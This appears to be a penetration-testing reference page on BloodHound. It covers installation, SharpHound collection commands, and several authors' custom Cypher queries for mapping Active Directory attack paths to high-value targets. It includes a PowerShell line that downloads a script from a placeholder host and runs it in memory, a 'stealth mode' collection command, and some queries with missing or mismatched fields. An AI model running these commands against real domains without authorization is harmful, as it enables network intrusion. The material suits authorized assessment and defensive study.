Install BloodHound
sudo apt-get install neo4j
sudo apt-get install bloodhound
# Run neo4j then bloodhound
sudo neo4j console
sudo blooudhound
Install BloodHound Community Edition
sudo apt-get install docker-compose
curl -L | docker compose -f - up
# When finished search through the terminal (if first run) for a generated password.
# go to http://localhost:8080 and login with Admin and the password
# Standard local execution
./SharpHound.exe --CollectionMethods All,GPOLocalGroup
Invoke-BloodHound -CollectionMethod "All,GPOLocalGroup"
Invoke-BloodHound -CollectionMethod All -CompressData -RemoveCSV
Invoke-BloodHound -CollectionMethod LoggedOn
# Specify different domain and run in stealth mode and collect only RDP data
Invoke-BloodHound --d <Domain> --Stealth --CollectionMethod RDP
# Run in context of different user
runas.exe /netonly /user:domain\user 'powershell.exe -nop -exec bypass'
# Download and execute in memory
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('http://<IP>:/SharpHound.ps1');Invoke-BloodHound"
# Metasploit
use post/windows/gather/bloodhound
Custom Queries
Replace the customqueries.json
with one of the below files to update the custom queries within Bloodhound. Remember to restart Bloodhound after changing the JSON file.
Locate custom queries file
sudo find / -type f -name customqueries.json 2>/dev/null
Add one of the queries below:
Click the tabs above to view relevant author's custom queries
CompassSecurity's Custom Queries
Author Github:
Click on the pencil icon next to Custom Queries in the Queries tab and paste in the queries below. Then refresh Bloodhound Queries tab -> Custom Queries -> Refresh icon.
"queries": [
"name": "All Shortest Paths to Domain (including Computers)",
"queryList": [
"final": false,
"title": "Select a Domain...",
"query": "MATCH (d:Domain) RETURN ORDER BY ASC"
"final": true,
"query": "MATCH p = allShortestPaths((uc)-[r:{}*1..]->(d:Domain {name: $result})) WHERE (uc:User OR uc:Computer) RETURN p",
"endNode": "{}"
"name": "All Shortest Paths to no LAPS",
"queryList": [
"final": true,
"query": "MATCH p = allShortestPaths((uc)-[r:{}*1..]->(c:Computer)) WHERE (uc:User OR uc:Computer) AND NOT uc = c AND c.haslaps = false RETURN p"
"name": "All Shortest Paths from Kerberoastable Users to Computers",
"queryList": [
"final": true,
"query": "MATCH p = allShortestPaths((u:User)-[r:{}*1..]->(c:Computer)) WHERE u.hasspn = true RETURN p"
"name": "All Shortest Paths from Kerberoastable Users to High Value Targets",
"queryList": [
"final": true,
"query": "MATCH p = allShortestPaths((u:User)-[r:{}*1..]->(h)) WHERE u.hasspn = true AND h.highvalue = true RETURN p"
"name": "All Shortest Paths from Owned Principals (including everything)",
"queryList": [
"final": true,
"query": "MATCH p = allShortestPaths((u:User)-[r:{}*1..]->(a)) WHERE u.owned = true AND u <> a RETURN p"
"name": "All Shortest Paths from Owned Principals to Domain",
"queryList": [
"final": false,
"title": "Select a Domain...",
"query": "MATCH (d:Domain) RETURN ORDER BY ASC"
"final": true,
"query": "MATCH p = allShortestPaths((o)-[r:{}*1..]->(d:Domain)) WHERE o.owned = true AND = $result RETURN p",
"endNode": "{}"
"name": "All Shortest Paths from Owned Principals to High Value Targets",
"queryList": [
"final": true,
"query": "MATCH p = allShortestPaths((o)-[r:{}*1..]->(h)) WHERE o.owned = true AND h.highvalue = true RETURN p"
"name": "All Shortest Paths from Owned Principals to no LAPS",
"queryList": [
"final": true,
"query": "MATCH p = allShortestPaths((o)-[r:{}*1..]->(c:Computer)) WHERE NOT o = c AND o.owned = true AND c.haslaps = false RETURN p"
"name": "All Shortest Paths from no Signing to Domain",
"queryList": [
"final": false,
"title": "Select a Domain...",
"query": "MATCH (d:Domain) RETURN ORDER BY ASC"
"final": true,
"query": "MATCH p = allShortestPaths((c:Computer)-[r:{}*1..]->(d:Domain)) WHERE c.hassigning = false AND = $result RETURN p",
"endNode": "{}"
"name": "All Shortest Paths from no Signing to High Value Targets",
"queryList": [
"final": true,
"query": "MATCH p = allShortestPaths((c:Computer)-[r:{}*1..]->(h)) WHERE NOT c = h AND c.hassigning = false AND h.highvalue = true RETURN p"
"name": "All Shortest Paths from Domain Users and Domain Computers (including everything)",
"queryList": [
"final": true,
"query": "MATCH p = allShortestPaths((g:Group)-[r:{}*1..]->(a)) WHERE (g.objectid =~ $domain_users_id OR g.objectid =~ $domain_computers_id) AND g <> a RETURN p",
"props": {
"domain_users_id": "S-1-5-.*-513",
"domain_computers_id": "S-1-5-.*-515"
"name": "All Unconstrained Delegation Principals (excluding Domain Controllers and Administrators)",
"queryList": [
"final": true,
"query": "MATCH (dca)-[r:MemberOf*0..]->(g:Group) WHERE g.objectid =~ $domain_controllers_id OR g.objectid =~ $administrators_id WITH COLLECT(dca) AS exclude MATCH p = (d:Domain)-[r:Contains*1..]->(uc) WHERE (uc:User OR uc:Computer) AND uc.unconstraineddelegation = true AND NOT uc IN exclude RETURN p",
"props": {
"domain_controllers_id": "S-1-5-.*-516",
"administrators_id": ".*-S-1-5-32-544"
"name": "All Constrained Delegations",
"queryList": [
"final": true,
"query": "MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p"
"name": "All Computers Allowed to Delegate for Another Computer",
"queryList": [
"final": true,
"query": "MATCH p = (c1:Computer)-[:AllowedToDelegate]->(c2:Computer) RETURN p"
"name": "All ACLs to Computers (excluding High Value Targets)",
"queryList": [
"final": true,
"query": "MATCH p = (ucg)-[r]->(c:Computer) WHERE (ucg:User OR ucg:Computer OR ucg:Group) AND ucg.highvalue = false AND r.isacl = true RETURN p"
"name": "All Computers in Domain Admins",
"queryList": [
"final": false,
"title": "Select a Domain Admins group...",
"query": "MATCH (g:Group) WHERE g.objectid =~ $domain_admins_id RETURN ORDER BY ASC",
"props": {
"domain_admins_id": "S-1-5-.*-512"
"final": true,
"query": "MATCH p = (c:Computer)-[r:MemberOf|HasSIDHistory*1..]->(g:Group) WHERE = $result RETURN p",
"endNode": "{}"
"name": "All Computers Local Admin to Another Computer",
"queryList": [
"final": true,
"query": "MATCH p = (c1:Computer)-[r1:AdminTo]->(c2:Computer) RETURN p UNION ALL MATCH p = (c3:Computer)-[r2:MemberOf|HasSIDHistory*1..]->(g:Group)-[r3:AdminTo]->(c4:Computer) RETURN p"
"name": "All Computers without LAPS",
"queryList": [
"final": true,
"query": "MATCH p = (d:Domain)-[r:Contains*1..]->(c:Computer) WHERE c.haslaps = false RETURN p"
"name": "All High Value Targets",
"queryList": [
"final": true,
"query": "MATCH p = (d:Domain)-[r:Contains*1..]->(h) WHERE h.highvalue = true RETURN p"
"name": "All Owned Principals",
"queryList": [
"final": true,
"query": "MATCH p = (d:Domain)-[r:Contains*1..]->(o) WHERE o.owned = true RETURN p"
"name": "All Users with Password in AD",
"queryList": [
"final": true,
"query": "MATCH p = (d:Domain)-[r:Contains*1..]->(u:User) WHERE u.userpassword IS NOT NULL RETURN p"
"name": "All Users with \"Pass\" in AD Description",
"queryList": [
"final": true,
"query": "MATCH p = (d:Domain)-[r:Contains*1..]->(u:User) WHERE u.description =~ '(?i).*pass.*' RETURN p"
"name": "All Users with Password not Required",
"queryList": [
"final": true,
"query": "MATCH p = (d:Domain)-[r:Contains*1..]->(u:User) WHERE u.passwordnotreqd = true RETURN p"
"name": "All Users with with Same Name in Different Domains",
"queryList": [
"final": true,
"query": "MATCH (u1:User),(u2:User) WHERE split(,'@')[0] = split(,'@')[0] AND u1.domain <> u2.domain AND tointeger(split(u1.objectid,'-')[7]) >= 1000 RETURN u1"
"name": "Set DCSync Principals as High Value Targets",
"queryList": [
"final": true,
"query": "MATCH (s)-[r:MemberOf|GetChanges*1..]->(d:Domain) WITH s, d MATCH (s)-[r:MemberOf|GetChangesAll*1..]->(d) WITH s, d MATCH p = (s)-[r:MemberOf|GetChanges|GetChangesAll*1..]->(d) SET s.highvalue = true, s.highvaluereason = 'DCSync Principal' RETURN p"
"name": "Set Unconstrained Delegation Principals as High Value Targets",
"queryList": [
"final": true,
"query": "MATCH p = (d:Domain)-[r:Contains*1..]->(uc) WHERE (uc:User OR uc:Computer) AND uc.unconstraineddelegation = true SET uc.highvalue = true, uc.highvaluereason = 'Unconstrained Delegation Principal' RETURN p"
"name": "Set Local Admin or Reset Password Principals as High Value Targets",
"queryList": [
"final": true,
"query": "MATCH (a)-[r:AdminTo|ForceChangePassword]->(b) SET a.highvalue = true, a.highvaluereason = 'Local Admin or Reset Password Principal' RETURN a"
"name": "Set Principals with Privileges on Computers as High Value Targets",
"queryList": [
"final": true,
"query": "MATCH (a)-[r:AllowedToDelegate|ExecuteDCOM|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner]->(n:Computer) SET a.highvalue = true, a.highvaluereason = 'Principal with Privileges on Computers' RETURN a"
"name": "Set Members of High Value Targets Groups as High Value Targets",
"queryList": [
"final": true,
"query": "MATCH (a)-[r:MemberOf*1..]->(g:Group) WHERE a.highvalue = false AND g.highvalue = true SET a.highvalue = true, a.highvaluereason = 'Member of High Value Target Group' RETURN a"
"name": "Remove Inactive Users and Computers from High Value Targets",
"queryList": [
"final": true,
"query": "MATCH (uc) WHERE uc.highvalue = true AND ((uc:User AND uc.enabled = false) OR (uc:Computer AND ((uc.enabled = false) OR (uc.lastlogon > 0 AND uc.lastlogon < (TIMESTAMP() / 1000 - 15552000)) OR (uc.lastlogontimestamp > 0 AND uc.lastlogontimestamp < (TIMESTAMP() / 1000 - 15552000))))) SET uc.highvalue = false, uc.nothighvaluereason = 'Inactive' RETURN uc"
Hausec's Custom Queries
Author Github:
Click on the pencil icon next to Custom Queries in the Queries tab and paste in the queries below. Then refresh Bloodhound Queries tab -> Custom Queries -> Refresh icon.
"queries": [
"name": "List all owned users",
"queryList": [
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
"name": "List all owned computers",
"queryList": [
"final": true,
"query": "MATCH (m:Computer) WHERE m.owned=TRUE RETURN m"
"name": "List all owned groups",
"queryList": [
"final": true,
"query": "MATCH (m:Group) WHERE m.owned=TRUE RETURN m"
"name": "List all High Valued Targets",
"queryList": [
"final": true,
"query": "MATCH (m) WHERE m.highvalue=TRUE RETURN m"
"name": "List the groups of all owned users",
"queryList": [
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE WITH m MATCH p=(m)-[:MemberOf*1..]->(n:Group) RETURN p"
"name": "Find the Shortest path to a high value target from an owned object",
"queryList": [
"final": true,
"query": "MATCH p=shortestPath((g {owned:true})-[*1..]->(n {highvalue:true})) WHERE g<>n return p"
"name": "Find the Shortest path to a unconstrained delegation system from an owned object",
"queryList": [
"final": true,
"query": "MATCH (n) MATCH p=shortestPath((n)-[*1..]->(m:Computer {unconstraineddelegation: true})) WHERE NOT n=m AND n.owned = true RETURN p"
"name": "Find all Kerberoastable Users",
"queryList": [
"final": true,
"query": "MATCH (n:User)WHERE n.hasspn=true RETURN n",
"allowCollapse": false
"name": "Find All Users with an SPN/Find all Kerberoastable Users with passwords last set less than 5 years ago",
"queryList": [
"final": true,
"query": "MATCH (u:User) WHERE u.hasspn=true AND u.pwdlastset < (datetime().epochseconds - (1825 * 86400)) AND NOT u.pwdlastset IN [-1.0, 0.0] RETURN, u.pwdlastset order by u.pwdlastset "
"name": "Find Kerberoastable Users with a path to DA",
"queryList": [
"final": true,
"query": "MATCH (u:User {hasspn:true}) MATCH (g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = shortestPath( (u)-[*1..]->(g) ) RETURN p"
"name": "Find machines Domain Users can RDP into",
"queryList": [
"final": true,
"query": "match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513' return p"
"name": "Find what groups can RDP",
"queryList": [
"final": true,
"query": "MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN p"
"name": "Find groups that can reset passwords (Warning: Heavy)",
"queryList": [
"final": true,
"query": "MATCH p=(m:Group)-[r:ForceChangePassword]->(n:User) RETURN p"
"name": "Find groups that have local admin rights (Warning: Heavy)",
"queryList": [
"final": true,
"query": "MATCH p=(m:Group)-[r:AdminTo]->(n:Computer) RETURN p"
"name": "Find all users that have local admin rights",
"queryList": [
"final": true,
"query": "MATCH p=(m:User)-[r:AdminTo]->(n:Computer) RETURN p"
"name": "Find all active Domain Admin sessions",
"queryList": [
"final": true,
"query": "MATCH (n:User)-[:MemberOf]->(g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = (c:Computer)-[:HasSession]->(n) return p"
"name": "Find all computers with Unconstrained Delegation",
"queryList": [
"final": true,
"query": "MATCH (c:Computer {unconstraineddelegation:true}) return c"
"name": "Find all computers with unsupported operating systems",
"queryList": [
"final": true,
"query": "MATCH (H:Computer) WHERE H.operatingsystem = '.*(2000|2003|2008|xp|vista|7|me).*' RETURN H"
"name": "Find users that logged in within the last 90 days",
"queryList": [
"final": true,
"query": "MATCH (u:User) WHERE u.lastlogon < (datetime().epochseconds - (90 * 86400)) and NOT u.lastlogon IN [-1.0, 0.0] RETURN u"
"name": "Find users with passwords last set within the last 90 days",
"queryList": [
"final": true,
"query": "MATCH (u:User) WHERE u.pwdlastset < (datetime().epochseconds - (90 * 86400)) and NOT u.pwdlastset IN [-1.0, 0.0] RETURN u"
"name": "Find constrained delegation",
"queryList": [
"final": true,
"query": "MATCH p=(u:User)-[:AllowedToDelegate]->(c:Computer) RETURN p"
"name": "Find computers that allow unconstrained delegation that AREN’T domain controllers.",
"queryList": [
"final": true,
"query": "MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT( AS domainControllers MATCH (c2:Computer {unconstraineddelegation:true}) WHERE NOT IN domainControllers RETURN c2"
"name": " Return the name of every computer in the database where at least one SPN for the computer contains the string 'MSSQL'",
"queryList": [
"final": true,
"query": "MATCH (c:Computer) WHERE ANY (x IN c.serviceprincipalnames WHERE toUpper(x) CONTAINS 'MSSQL') RETURN c"
"name": "View all GPOs",
"queryList": [
"final": true,
"query": "Match (n:GPO) RETURN n"
"name": "View all groups that contain the word 'admin'",
"queryList": [
"final": true,
"query": "Match (n:Group) WHERE CONTAINS 'ADMIN' RETURN n"
"name": "Find users that can be AS-REP roasted",
"queryList": [
"final": true,
"query": "MATCH (u:User {dontreqpreauth: true}) RETURN u"
"name": "Find All Users with an SPN/Find all Kerberoastable Users with passwords last set > 5 years ago",
"queryList": [
"final": true,
"query": "MATCH (u:User) WHERE n.hasspn=true AND WHERE u.pwdlastset < (datetime().epochseconds - (1825 * 86400)) and NOT u.pwdlastset IN [-1.0, 0.0] RETURN u"
"name": "Show all high value target's groups",
"queryList": [
"final": true,
"query": "MATCH p=(n:User)-[r:MemberOf*1..]->(m:Group {highvalue:true}) RETURN p"
"name": "Find groups that contain both users and computers",
"queryList": [
"final": true,
"query": "MATCH (c:Computer)-[r:MemberOf*1..]->(groupsWithComps:Group) WITH groupsWithComps MATCH (u:User)-[r:MemberOf*1..]->(groupsWithComps) RETURN DISTINCT(groupsWithComps) as groupsWithCompsAndUsers"
"name": "Find Kerberoastable users who are members of high value groups",
"queryList": [
"final": true,
"query": "MATCH (u:User)-[r:MemberOf*1..]->(g:Group) WHERE g.highvalue=true AND u.hasspn=true RETURN u"
"name": "Find Kerberoastable users and where they are AdminTo",
"queryList": [
"final": true,
"query": "OPTIONAL MATCH (u1:User) WHERE u1.hasspn=true OPTIONAL MATCH (u1)-[r:AdminTo]->(c:Computer) RETURN u"
"name": "Find computers with constrained delegation permissions and the corresponding targets where they allowed to delegate",
"queryList": [
"final": true,
"query": "MATCH (c:Computer) WHERE c.allowedtodelegate IS NOT NULL RETURN c"
"name": "Find if any domain user has interesting permissions against a GPO (Warning: Heavy)",
"queryList": [
"final": true,
"query": "MATCH p=(u:User)-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|GpLink*1..]->(g:GPO) RETURN p"
"name": "Find if unprivileged users have rights to add members into groups",
"queryList": [
"final": true,
"query": "MATCH (n:User {admincount:False}) MATCH p=allShortestPaths((n)-[r:AddMember*1..]->(m:Group)) RETURN p"
"name": "Find all users a part of the VPN group",
"queryList": [
"final": true,
"query": "Match p=(u:User)-[:MemberOf]->(g:Group) WHERE toUPPER ( CONTAINS 'VPN' return p"
"name": "Find users that have never logged on and account is still active",
"queryList": [
"final": true,
"query": "MATCH (n:User) WHERE n.lastlogontimestamp=-1.0 AND n.enabled=TRUE RETURN n "
"name": "Find an object in one domain that can do something to a foreign object",
"queryList": [
"final": true,
"query": "MATCH p=(n)-[r]->(m) WHERE NOT n.domain = m.domain RETURN p"
"name": "Find all sessions a user in a specific domain has",
"requireNodeSelect": true,
"queryList": [
"final": false,
"title": "Select source domain...",
"query": "MATCH (n:Domain) RETURN ORDER BY"
"final": true,
"query": "MATCH p=(m:Computer)-[r:HasSession]->(n:User {domain:{result}}) RETURN p",
"startNode": "{}",
"allowCollapse": false
"name": "Find an object from domain 'A' that can do anything to a foreign object",
"requireNodeSelect": true,
"queryList": [
"final": false,
"title": "Select source domain...",
"query": "MATCH (n:Domain) RETURN ORDER BY"
"final": true,
"query": "MATCH p=(n {domain:{result}})-[r]->(d) WHERE NOT d.domain=n.domain RETURN p",
"startNode": "{}",
"allowCollapse": false
"name": "Find All edges any owned user has on a computer",
"queryList": [
"final": true,
"query": "MATCH p=shortestPath((m:User)-[r*]->(b:Computer)) WHERE m.owned RETURN p"
"name": "----------------------------------------AZURE QUERIES----------------------------------",
"queryList": [
"final": true,
"query": ""
"name": "Return All Azure Users that are part of the 'Global Administrator' Role",
"queryList": [
"final": true,
"query": "MATCH p =(n)-[r:AZGlobalAdmin*1..]->(m) RETURN p"
"name": "Return All On-Prem users with edges to Azure",
"queryList": [
"final": true,
"query": "MATCH p=(m:User)-[r:AZResetPassword|AZOwns|AZUserAccessAdministrator|AZContributor|AZAddMembers|AZGlobalAdmin|AZVMContributor|AZOwnsAZAvereContributor]->(n) WHERE m.objectid CONTAINS 'S-1-5-21' RETURN p"
"name": "Find all paths to an Azure VM",
"queryList": [
"final": true,
"query": "MATCH p = (n)-[r]->(g:AZVM) RETURN p"
"name": "Find all paths to an Azure KeyVault",
"queryList": [
"final": true,
"query": "MATCH p = (n)-[r]->(g:AZKeyVault) RETURN p"
"name": "Return All Azure Users and their Groups",
"queryList": [
"final": true,
"query": "MATCH p=(m:AZUser)-[r:MemberOf]->(n) WHERE NOT m.objectid CONTAINS 'S-1-5' RETURN p"
"name": "Return All Azure AD Groups that are synchronized with On-Premise AD",
"queryList": [
"final": true,
"query": "MATCH (n:Group) WHERE n.objectid CONTAINS 'S-1-5' AND n.azsyncid IS NOT NULL RETURN n"
"name": "Find all Privileged Service Principals",
"queryList": [
"final": true,
"query": "MATCH p = (g:AZServicePrincipal)-[r]->(n) RETURN p"
"name": "Find all Owners of Azure Applications",
"queryList": [
"final": true,
"query": "MATCH p = (n)-[r:AZOwns]->(g:AZApp) RETURN p"
Seajaysec's Custom Queries
Author Github:
Click on the pencil icon next to Custom Queries in the Queries tab and paste in the queries below. Then refresh Bloodhound Queries tab -> Custom Queries -> Refresh icon.
"queries": [{
"name": "List all owned users",
"queryList": [{
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
"name": "List all owned computers",
"queryList": [{
"final": true,
"query": "MATCH (m:Computer) WHERE m.owned=TRUE RETURN m"
"name": "List all owned groups",
"queryList": [{
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
"name": "List the groups of all owned users",
"queryList": [{
"final": true,
"query": "MATCH (m:User) WHERE m.owned=TRUE WITH m MATCH p=(m)-[:MemberOf*1..]->(n:Group) RETURN p"
"name": "Show owned Nodes with Groups",
"queryList": [{
"final": true,
"query": "MATCH (u:User {owned:true}), (g:Group), p=(u)-[:MemberOf]->(g) RETURN p",
"props": {},
"allowCollapse": true
"name": "Find logged in Admins",
"queryList": [{
"final": true,
"query": "MATCH p=(a:Computer)-[r:HasSession]->(b:User) WITH a,b,r MATCH p=shortestPath((b)-[:AdminTo|MemberOf*1..]->(a)) RETURN p",
"allowCollapse": true
"name": "Top Ten Users with Most Sessions",
"queryList": [{
"final": true,
"query": "MATCH (n:User),(m:Computer), (n)<-[r:HasSession]-(m) WHERE NOT STARTS WITH 'ANONYMOUS LOGON' AND NOT'' WITH n, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN p",
"allowCollapse": true
"name": "Top Ten Computers with Most Sessions",
"queryList": [{
"final": true,
"query": "MATCH (n:User),(m:Computer), (n)<-[r:HasSession]-(m) WHERE NOT STARTS WITH 'ANONYMOUS LOGON' AND NOT'' WITH m, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)-[r:HasSession]->(n) RETURN n,r,m",
"allowCollapse": true
"name": "Find all Kerberoastable Users",
"queryList": [{
"final": true,
"query": "MATCH (n:User)WHERE n.hasspn=true RETURN n",
"allowCollapse": false
"name": "Find All Users with an SPN/Find all Kerberoastable Users with passwords last set less than 5 years ago",
"queryList": [{
"final": true,
"query": "MATCH (u:User) WHERE u.hasspn=true AND u.pwdlastset < (datetime().epochseconds - (1825 * 86400)) AND NOT u.pwdlastset IN [-1.0, 0.0] RETURN, u.pwdlastset order by u.pwdlastset "
"name": "Find Kerberoastable Users with a path to DA",
"queryList": [{
"final": true,
"query": "MATCH (u:User {hasspn:true}) MATCH (g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = shortestPath( (u)-[*1..]->(g) ) RETURN p"
"name": "Find Kerberoastable Users with a path to High Value",
"queryList": [{
"final": true,
"query": "MATCH (u:User {hasspn:true}),(n {highvalue:true}),p = shortestPath( (u)-[*1..]->(n) ) RETURN p"
"name": "Find machines Domain Users can RDP into",
"queryList": [{
"final": true,
"query": "match p=(g:Group)-[:CanRDP]->(c:Computer) where g.objectid ENDS WITH '-513' return p"
"name": "Find Servers Domain Users can RDP To",
"queryList": [{
"final": true,
"query": "match p=(g:Group)-[:CanRDP]->(c:Computer) where STARTS WITH 'DOMAIN USERS' AND c.operatingsystem CONTAINS 'Server' return p",
"allowCollapse": true
"name": "Find what groups can RDP",
"queryList": [{
"final": true,
"query": "MATCH p=(m:Group)-[r:CanRDP]->(n:Computer) RETURN p"
"name": "Non Admin Groups with High Value Privileges",
"queryList": [{
"final": true,
"query": "MATCH p=(g:Group)-[r:Owns|:WriteDacl|:GenericAll|:WriteOwner|:ExecuteDCOM|:GenericWrite|:AllowedToDelegate|:ForceChangePassword]->(n:Computer) WHERE NOT CONTAINS 'ADMIN' RETURN p",
"allowCollapse": true
"name": "Find groups that can reset passwords (Warning: Heavy)",
"queryList": [{
"final": true,
"query": "MATCH p=(m:Group)-[r:ForceChangePassword]->(n:User) RETURN p"
"name": "Groups with Computer and User Objects",
"queryList": [{
"final": true,
"query": "MATCH (c:Computer)-[r:MemberOf*1..]->(groupsWithComps:Group) WITH groupsWithComps MATCH (u:User)-[r:MemberOf*1..]->(groupsWithComps) RETURN DISTINCT(groupsWithComps) as groupsWithCompsAndUsers",
"allowCollapse": true,
"endNode": "{}"
"name": "Find groups that have local admin rights (Warning: Heavy)",
"queryList": [{
"final": true,
"query": "MATCH p=(m:Group)-[r:AdminTo]->(n:Computer) RETURN p"
"name": "Find all users that have local admin rights",
"queryList": [{
"final": true,
"query": "MATCH p=(m:User)-[r:AdminTo]->(n:Computer) RETURN p"
"name": "Top Ten Users with Most Local Admin Rights",
"queryList": [{
"final": true,
"query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT STARTS WITH 'ANONYMOUS LOGON' AND NOT'' WITH n, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN p",
"allowCollapse": true
"name": "Top Ten Computers with Most Admins",
"queryList": [{
"final": true,
"query": "MATCH (n:User),(m:Computer), (n)-[r:AdminTo]->(m) WHERE NOT STARTS WITH 'ANONYMOUS LOGON' AND NOT'' WITH m, count(r) as rel_count order by rel_count desc LIMIT 10 MATCH p=(m)<-[r:AdminTo]-(n) RETURN p",
"allowCollapse": true
"name": "Find all active Domain Admin sessions",
"queryList": [{
"final": true,
"query": "MATCH (n:User)-[:MemberOf]->(g:Group) WHERE g.objectid ENDS WITH '-512' MATCH p = (c:Computer)-[:HasSession]->(n) return p"
"name": "Can a user from domain ‘A ‘ do anything to any computer in domain ‘B’ (Warning: VERY Heavy)",
"queryList": [{
"final": false,
"title": "Select source domain...",
"query": "MATCH (n:Domain) RETURN ORDER BY DESC"
"final": false,
"title": "Select destination domain...",
"query": "MATCH (n:Domain) RETURN ORDER BY DESC"
"final": true,
"query": "MATCH (n:User {domain: {result}}) MATCH (m:Computer {domain: {}}) MATCH p=allShortestPaths((n)-[r:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|CanRDP|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin*1..]->(m)) RETURN p",
"startNode": "{}",
"allowCollapse": false
"name": "Find all computers with Unconstrained Delegation",
"queryList": [{
"final": true,
"query": "MATCH (c:Computer {unconstraineddelegation:true}) return c"
"name": "Find all computers with unsupported operating systems",
"queryList": [{
"final": true,
"query": "MATCH (H:Computer) WHERE H.operatingsystem =~ '.*(2000|2003|2008|xp|vista|7|me)*.' RETURN H"
"name": "Find users that logged in within the last 90 days",
"queryList": [{
"final": true,
"query": "MATCH (u:User) WHERE u.lastlogon < (datetime().epochseconds - (90 * 86400)) and NOT u.lastlogon IN [-1.0, 0.0] RETURN u"
"name": "Find users with passwords last set within the last 90 days",
"queryList": [{
"final": true,
"query": "MATCH (u:User) WHERE u.pwdlastset < (datetime().epochseconds - (90 * 86400)) and NOT u.pwdlastset IN [-1.0, 0.0] RETURN u"
"name": "Find constrained delegation",
"queryList": [{
"final": true,
"query": "MATCH p=(u:User)-[:AllowedToDelegate]->(c:Computer) RETURN p"
"name": "Find computers that allow unconstrained delegation that AREN’T domain controllers.",
"queryList": [{
"final": true,
"query": "MATCH (c1:Computer)-[:MemberOf*1..]->(g:Group) WHERE g.objectid ENDS WITH '-516' WITH COLLECT( AS domainControllers MATCH (c2:Computer {unconstraineddelegation:true}) WHERE NOT IN domainControllers RETURN c2"
"name": " Return the name of every computer in the database where at least one SPN for the computer contains the string 'MSSQL'",
"queryList": [{
"final": true,
"query": "MATCH (c:Computer) WHERE ANY (x IN c.serviceprincipalnames WHERE toUpper(x) CONTAINS 'MSSQL') RETURN c"
"name": "View all GPOs",
"queryList": [{
"final": true,
"query": "Match (n:GPO) RETURN n"
"name": "View all groups that contain the word 'admin'",
"queryList": [{
"final": true,
"query": "Match (n:Group) WHERE CONTAINS 'ADMIN' RETURN n"
"name": "Find users that can be AS-REP roasted",
"queryList": [{
"final": true,
"query": "MATCH (u:User {dontreqpreauth: true}) RETURN u"
"name": "Find All Users with an SPN/Find all Kerberoastable Users with passwords last set > 5 years ago",
"queryList": [{
"final": true,
"query": "MATCH (u:User) WHERE n.hasspn=true AND WHERE u.pwdlastset < (datetime().epochseconds - (1825 * 86400)) and NOT u.pwdlastset IN [-1.0, 0.0] RETURN u"
"name": "Show all high value target's groups",
"queryList": [{
"final": true,
"query": "MATCH p=(n:User)-[r:MemberOf*1..]->(m:Group {highvalue:true}) RETURN p"
"name": "Find groups that contain both users and computers",
"queryList": [{
"final": true,
"query": "MATCH (c:Computer)-[r:MemberOf*1..]->(groupsWithComps:Group) WITH groupsWithComps MATCH (u:User)-[r:MemberOf*1..]->(groupsWithComps) RETURN DISTINCT(groupsWithComps) as groupsWithCompsAndUsers"
"name": "Shortest Path from Domain Users to High Value Targets",
"queryList": [{
"final": true,
"query": "MATCH (g:Group),(n {highvalue:true}),p=shortestPath((g)-[r*1..]->(n)) WHERE STARTS WITH 'DOMAIN USERS' return p",
"allowCollapse": true
"name": "ALL Path from Domain Users to High Value Targets",
"queryList": [{
"final": true,
"query": "MATCH (g:Group) WHERE STARTS WITH 'DOMAIN USERS' MATCH (n {highvalue:true}),p=shortestPath((g)-[r*1..]->(n)) return p",
"allowCollapse": true
"name": "Find Kerberoastable users who are members of high value groups",
"queryList": [{
"final": true,
"query": "MATCH (u:User)-[r:MemberOf*1..]->(g:Group) WHERE g.highvalue=true AND u.hasspn=true RETURN u"
"name": "Find Kerberoastable users and where they are AdminTo",
"queryList": [{
"final": true,
"query": "OPTIONAL MATCH (u1:User) WHERE u1.hasspn=true OPTIONAL MATCH (u1)-[r:AdminTo]->(c:Computer) RETURN u"
"name": "Find computers with constrained delegation permissions and the corresponding targets where they allowed to delegate",
"queryList": [{
"final": true,
"query": "MATCH (c:Computer) WHERE c.allowedtodelegate IS NOT NULL RETURN c"
"name": "Find if any domain user has interesting permissions against a GPO (Warning: Heavy)",
"queryList": [{
"final": true,
"query": "MATCH p=(u:User)-[r:AllExtendedRights|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|GpLink*1..]->(g:GPO) RETURN p"
"name": "Find if unprivileged users have rights to add members into groups",
"queryList": [{
"final": true,
"query": "MATCH (n:User {admincount:False}) MATCH p=allShortestPaths((n)-[r:AddMember*1..]->(m:Group)) RETURN p"
"name": "Find all users a part of the VPN group",
"queryList": [{
"final": true,
"query": "Match p=(u:User)-[:MemberOf]->(g:Group) WHERE toUPPER ( CONTAINS 'VPN' return p"
"name": "Paths from DU to DA without RDP",
"queryList": [{
"final": false,
"title": "Select a Domain Admin group...",
"query": "MATCH (n:Group) WHERE n.objectsid =~ {name} RETURN ORDER BY DESC",
"props": {
"name": "(?i)S-1-5-.*-512"
"final": true,
